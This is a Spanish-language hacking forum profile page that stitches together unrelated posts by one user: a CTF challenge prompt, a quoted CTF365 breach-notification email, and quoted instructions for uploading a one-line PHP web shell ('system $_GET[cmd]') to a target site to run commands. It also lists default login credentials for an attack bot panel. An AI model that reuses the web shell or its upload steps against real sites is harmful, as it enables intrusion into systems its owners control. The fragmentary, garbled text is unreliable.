Lograr que el binario arroje el mensaje "You fucked me!".
Enviar exploit por inbox.
Enviar exploit por inbox.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúCitarHi q3rv0,
As you might already know, we had a small incident yesterday (November 25th). One of our former CTF365 team mates throw a list with usernames and their email address in the wild. Immediately we took action and reported to Romanian CERT (Computer Emergency Respond Team). They'll
start to dig in too as well as the Police (cybercrime dept).
We're sorry for this happening.
For your information, we have all passwords hashed, salted and we use Devise for authentication [1]. So except that there was the email addresses and usernames, nothing ugly and deep was compromised. Also as you know, we don't keep sensitive data on our
platform for this specific reason (in case of hacking not to find sensitive data). This is the reason we work with third party gateway payment system. More expensive for us, but a lot safer for you as a user.
Safety is our priority and always will be. This wasn't a security flow/breach or vulnerability, this was a vendetta from a former team mate whom we trusted.
As we speak, we're in process for a fresh install to all our infrastructure machines in order to avoid any possible backdoors left behind.
We recommend you to change your CTF365 account password once we'll be back, up and running.
Once again, sorry for the incident and if there is anything more you want to know, please do ask. I'd gladly answer to your questions.
Best regards,
[1] No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Marius Corici
CEO for CTF365
Citar- El archivo es este : <? php system $_GET[cmd]); ?>
Citar- Ya con el archivo subido van al link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y les tiene que aparecer algo así nt autorythy/system nt. O cualquiera parecido si no les sale nada o les sale nt es porque no tiene vps la página web.
Citarsi no les sale nada o les sale nt es porque no tiene vps la página web
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cual es la maldita pass? ay esta instalado y no me deja entrar cual es el US y el pass
CitarEl mismo debera ser alojado en el host que se desea utilizar para realizar el ataque.
Una vez montada (instrucciones en el video de abajo) nos loguearemos con los siguientes datos por defecto.
User:q3rv0
Pass:ravenbot
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Podrían dar alguna pista del reto?
Agradecido !